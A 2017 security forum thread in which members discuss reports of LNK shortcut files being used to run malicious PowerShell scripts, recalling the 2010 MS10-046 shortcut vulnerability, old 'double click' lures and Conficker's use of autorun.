LNK files again being used to deliver malicious PowerShell script

Discussion in 'malware problems & news' started by itman, May 26, 2017.

  1. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    https://www.scmagazine.com/lnk-file...r-malicious-powershell-script/article/664399/
     
  2. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    Per the Trend Micro source article link noted above, this is a clever trick being employed:
     
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    They were used at least as far back as 2010:

    Downloader-CJX Cashing In on Microsoft .LNK Flaw
    http://www.avertlabs.com/research/blog/index.php/category/exploit-research/
    Microsoft Security Bulletin MS10-046 - Critical
    Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198 )
    Published: August 02, 2010
    https://technet.microsoft.com/en-us/library/security/ms10-046.aspx
    As with so many exploits patched by Microsoft, many users did not patch, so the exploit continued to be used successfully for quite a while.

    “double click for content” is an old lure that goes back at least to 2009. An RTF example:

    http://rsjphoto.net/computing/rtf/

    There you go!

    ----
    rich
     
  4. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    The difference with the current .lnk malware versus past use is those exploited vulnerabilities. The current strain of malware is using .lnk files as designed but using them to run legit processes such as mshata.exe to in turn run malware laced scripts and the like.

    Nothing like using Windows to infect Windows:argh:
     
    Last edited: May 26, 2017
  5. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Yes! In one sense, though, many exploits use Windows to infect Windows - the orginal LNK exploit used a vulnerability in the Windows Shell.

    Not using a legitimate file as in this case, of course... which reminds me of Conficker's later versions which used autorun to start rundll32.exe to run its malicious DLL.

    ----
    rich
     
    Last edited: May 26, 2017
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.